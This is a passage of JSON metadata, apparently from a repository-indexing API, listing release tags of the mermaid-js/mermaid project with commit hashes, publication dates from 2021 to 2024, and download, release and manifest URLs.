/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/